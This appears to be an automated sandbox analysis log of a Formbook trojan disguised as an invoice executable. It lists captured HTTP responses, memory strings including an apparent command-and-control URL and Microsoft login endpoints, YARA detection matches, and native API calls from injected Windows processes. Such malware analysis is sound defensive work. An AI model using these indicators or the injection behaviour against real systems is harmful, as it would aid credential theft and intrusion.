Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:45 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nodigitalsmoke.org
Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nodigitalsmoke.org/pnbu/
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: replace.exe, 00000005.00000002.3291550327.000000000259E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: replace.exe, 00000005.00000003.2706454886.000000000728B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3293199751.00000000035D6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.strato.de
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046DC80
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, 0_2_0044C37A
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C81C

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: Revised Invoice H000127896.exe
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C303 NtClose, 2_2_0042C303
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872B60 NtClose,LdrInitializeThunk, 2_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk, 2_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03874340 NtSetContextThread, 2_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03874650 NtSuspendThread, 2_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872B80 NtQueryInformationFile, 2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872BA0 NtEnumerateValueKey, 2_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872BE0 NtQueryValueKey, 2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872BF0 NtAllocateVirtualMemory, 2_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872AB0 NtWaitForSingleObject, 2_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872AD0 NtReadFile, 2_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872AF0 NtWriteFile, 2_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872F90 NtProtectVirtualMemory, 2_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872FA0 NtQuerySection, 2_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872FB0 NtResumeThread, 2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872FE0 NtCreateFile, 2_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872F30 NtCreateSection, 2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872F60 NtCreateProcessEx, 2_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872E80 NtReadVirtualMemory, 2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872EA0 NtAdjustPrivilegesToken, 2_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872EE0 NtQueueApcThread, 2_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872E30 NtWriteVirtualMemory, 2_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872DB0 NtEnumerateKey, 2_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872DD0 NtDelayExecution, 2_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872D00 NtSetInformationFile, 2_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872D10 NtMapViewOfSection, 2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872D30 NtUnmapViewOfSection, 2_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872CA0 NtQueryInformationToken, 2_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872CC0 NtQueryVirtualMemory, 2_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872CF0 NtOpenProcess, 2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872C00 NtQueryInformationProcess, 2_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03872C60 NtCreateKey, 2_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03873090 NtSetValueKey, 2_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03873010 NtOpenDirectoryObject, 2_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038739B0 NtGetContextThread, 2_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03873D10 NtOpenProcessToken, 2_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03873D70 NtOpenThread, 2_2_03873D70
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB4340 NtSetContextThread,LdrInitializeThunk, 5_2_02AB4340
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB4650 NtSuspendThread,LdrInitializeThunk, 5_2_02AB4650
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2AF0 NtWriteFile,LdrInitializeThunk, 5_2_02AB2AF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2AD0 NtReadFile,LdrInitializeThunk, 5_2_02AB2AD0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_02AB2BA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_02AB2BE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_02AB2BF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2B60 NtClose,LdrInitializeThunk, 5_2_02AB2B60
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_02AB2E80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_02AB2EE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2FB0 NtResumeThread,LdrInitializeThunk, 5_2_02AB2FB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2FE0 NtCreateFile,LdrInitializeThunk, 5_2_02AB2FE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2F30 NtCreateSection,LdrInitializeThunk, 5_2_02AB2F30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_02AB2CA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2C60 NtCreateKey,LdrInitializeThunk, 5_2_02AB2C60
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_02AB2C70
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_02AB2DF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_02AB2DD0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_02AB2D30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_02AB2D10
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB35C0 NtCreateMutant,LdrInitializeThunk, 5_2_02AB35C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB39B0 NtGetContextThread,LdrInitializeThunk, 5_2_02AB39B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2AB0 NtWaitForSingleObject, 5_2_02AB2AB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2B80 NtQueryInformationFile, 5_2_02AB2B80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2EA0 NtAdjustPrivilegesToken, 5_2_02AB2EA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2E30 NtWriteVirtualMemory, 5_2_02AB2E30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2FA0 NtQuerySection, 5_2_02AB2FA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2F90 NtProtectVirtualMemory, 5_2_02AB2F90
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2F60 NtCreateProcessEx, 5_2_02AB2F60
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2CF0 NtOpenProcess, 5_2_02AB2CF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2CC0 NtQueryVirtualMemory, 5_2_02AB2CC0
